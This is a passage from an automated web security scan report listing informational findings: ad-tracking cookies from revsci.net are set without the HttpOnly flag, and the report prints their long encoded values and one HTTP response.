rsi_segs_1000000=pUPF4j+huHIMHvC1v6FY5BAFiE2lu64fVY6/Tm+YLTQmufPZ01rc6vdg2v/oPlIcMX/OvdTE/uq6JB33VvBVw0bvGRPtPVF+v31Di+ws9t2aJi6fJfcYPOegZxQVZYR2KOkQqCbRlwQpf87la8qMva2fdzFQ0Rjo4nVnPf51DBQFzH8NDiVhMKNJfwEt1TQbc0vhwojK+4qaN2+/+HnGmsjpufR5knvKQ8N//2J3I/z/74Fa0h7TEN0cV4UW2ewjF12bJ/yIk67vBSwjKBtCVtSnBPdqT1qu883AOe0/82dCdGlIU/ssRDzOF7worKDEPkB4qT+ibUaClOlYPsIrC3MEcG2omGwvO5NgVAjNTNuSN58+l4tQTtPevwht31nvuqfXdgXWTuaXrXb1gXp1KTPtf7kb9UYzupdyf5PX0IkVznHvumJnRYiWH+nYii7438v9NbzKztvTTKaZfeCphtHUw7gnP/uNalPDQCz6vEcinpDTJr/HSESuGASxo7VdJ4qIj/oD8XuAK4TuCotbm/W/AovIHMJ5LD9Y/KYGPxsCPABSHpul6yzR9OAoNE8CsWbwoY76Fu2Z9q2aeQWqJN5VERwz6NAC3n4CZDyL1irUCYY+ZAHAiw7x2UhXmxSNo+ZrIbKJfUn8WDqKhYpr/lcG5TPKc0KmVcV8AoTfKiiUmZ5s8xWGNeTqs8WNiDI0CQHiUZtow78bGv8yAtv0vMAiLlB+b0aOEsxN4b9NFMR7Oi/Iufbc1FfizZQYxVJ5mYmbsBdDeOjWyy9wMy/g8ZjrVJ7rHZnfzJWYx84+SAgnbh/fcyRq; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/
rtc_4K_j=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.109. http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/513736918.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFOcPC7nMQVv0bea4zXdqaN00wXH9OwgTAQapo1TU0ubO+NPBo4EXogx1f8njWmBHnqWfgLfri7RfBvzJVf7SyFDaR0MlGrKGTiaYJPamDzK30EAT/SI126MtmimUuvg/k+PioAHg+J+FH9aWWWPcaDCerAS40UiAbyIU8lpYp6sc3is99Ym7hKs946X4C6xZvJ/hnt7zarqcdNGab9as5vCNbT8VG0DCe+/XysCwh/pOGz5TYyg==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/
rtc_bwZ4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E3r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCF5Z/4S; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.110. http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/551354059.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4k+huAIMDjaxs0YFwqim7poa4ScLEaYNkX2Il9r5vw/ZUtic6udg2v9kDss6IjO5o23BoCO6Yh1pQKbTEaLZs6jeydgaN1bDMvXJfMmrtjdgi/lh4+qjESwdtMDZ2Xg0iKYNtxVTf87l8tTQ5a2fdzBO01hpasaFs3zi4R/U2Y6bnTHOuev6dgjYSCSM5L5W8uISkMwVh/e8mTsl8XrcZBWNDdNhtQGHvcGTyrrJkAMYg6KpNJ8v5Ojd3ERdmLUGU0MhvzKOTCurdC9RTFdx6PRHh0LMAWqUPpQHjrd1hgjmhDDF9RLeyr60VS3aEiwyLkzlYGpBmYxaEGS15vaTnZ1XjLYqJLJYkWoF+kgYmzO68/pLe3JGQYRfgkwN+8hyka274XX+Pm9wsaKdn86RlJ4qwCQnlaFkCz8WhLQ87qJvZikXZpFzdiYv8/zEDK36HH7mRptsgN2HjsyP+KkSXatbukqVnBpqpIVvgoVhr68hpmGnxQjcr7bR+OVBnJwnaPbjbooCYVI+l+7PE6ZDI5ai7bnH8H/VsHevO7O5jHl7RKCPE4FbwD0i3Og2jlmw+FR62d/wdRRzaECgxrjJglhapYso4GUwCxc8pvB7daMsxOs+uUXiODhQmpIfG9OubRDXn0Oqb0NAWbqvs9vHvWam/q9hJN8mVaAIy/9lNcAdFfYK64LDsCneGrzcy22+iKY/O6/RQN0a/sA6JAIm9cKhxJ8UAP2JG1gF4ps9a3yMhz/RLM23iuhvT6cwM7kJO//obZav4KW1tKbteMmIdcnaCj0GgKI6vg5++TYOKX8=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:29 GMT; Path=/
rtc_uvoL=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.111. http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/562084143.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5BAFiE2lu64fTXbwk32ILzQmufPZU63k5HlskvBlDss6IgvkSQstmQwrMQ3yY/VQb+XpGRPtPdF/P3xDi+xs9p2qFQoXaeUwOOegZxQVZYR2KCkQqCbRlwQpf87la8qMfa2fdzFQ0TyNPZLi+zmYamHuHrQfTLzzkmjbvQ4A1+qkvMUp1Q8EPIZHldrm7RX7vjzPS1hCgtBdKFT5yakB0dwEt8yy1Wy8MVYkqR3iNIjv9dBsXUpcWMrfdHafcSkz+Wc3n68tYm8zJOmCw5FgYtyhlsT30uqmQiAFF42QL7KFHW412CHpL2aQjBxEgqCMdlYnfIY/OvpEUJUEV+JwGyfUWwQJhoZ+LV5H5Od9QuH0RMsKPSeiYAFgLiciPP+HwMadiS218pIt9CDWHegko8z2NSaN8GLhXO7ZzMVTiLefN4oTccmbii8yd2ZE2dbvSQXV5HVasLLo7CabTqrU8Ftt4qPv9FgA6uVTq+DODKbhGtVKmQi8wa6soY1r8Gg1W/vbUnWhE1n0dL4+YaWZYwVgvqX4ReujuW9NpBoIOuEXclBxJGfae76mOLOhi7XB4fjMZPkXl5go/G8u2UIN6VieY6icniHpCBoG6ELfYnMSc9Qpn32GIGUS+VxTA+ZmEONEQUlCRXtJWGbSYBO3VHGdEraMclrTrPJ6SN++HietQ/6TXz3K50jGSB67S4UU+fu9My+1quNVNKXnMd4QCb7ZolUExqxCFzEvRTFjuCyf64MM3YX70AFru9LIo/V1CnNxecZnIVwAXILRiR1yiBaDruJvB3KzHQ==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/
rtc_kb6R=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_TX1Q=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5BAFiE2lu64fTXbwk32ILzQmufPZU63k5HlskvBlDss6IgvkSQstmQwrMQ3yY/VQb+XpGRPtPdF/P3xDi+xs9p2qFQoXaeUwOOegZxQVZYR2KCkQqCbRlwQpf87la8qMfa2fdzFQ0TyNPZLi+zmYamHuHrQfTLzzkmjbvQ4A1+qkvMUp1Q8EPIZHldrm7RX7vjzPS1hCgtBdKFT5yakB0dwEt8yy1Wy8MVYkqR3iNIjv9dBsXUpcWMrfdHafcSkz+Wc3n68tYm8zJOmCw5FgYtyhlsT30uqmQiAFF42QL7KFHW412CHpL2aQjBxEgqCMdlYnfIY/OvpEUJUEV+JwGyfUWwQJhoZ+LV5H5Od9QuH0RMsKPSeiYAFgLiciPP+HwMadiS218pIt9CDWHegko8z2NSaN8GLhXO7ZzMVTiLefN4oTccmbii8yd2ZE2dbvSQXV5HVasLLo7CabTqrU8Ftt4qPv9FgA6uVTq+DODKbhGtVKmQi8wa6soY1r8Gg1W/vbUnWhE1n0dL4+YaWZYwVgvqX4ReujuW9NpBoIOuEXclBxJGfae76mOLOhi7XB4fjMZPkXl5go/G8u2UIN6VieY6icniHpCBoG6ELfYnMSc9Qpn32GIGUS+VxTA+ZmEONEQUlCRXtJWGbSYBO3VHGdEraMclrTrPJ6SN++HietQ/6TXz3K50jGSB67S4UU+fu9My+1quNVNKXnMd4QCb7ZolUExqxCFzEvRTFjuCyf64MM3YX70AFru9LIo/V1CnNxecZnIVwAXILRiR1yiBaDruJvB3KzHQ==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/
Set-Cookie: rtc_kb6R=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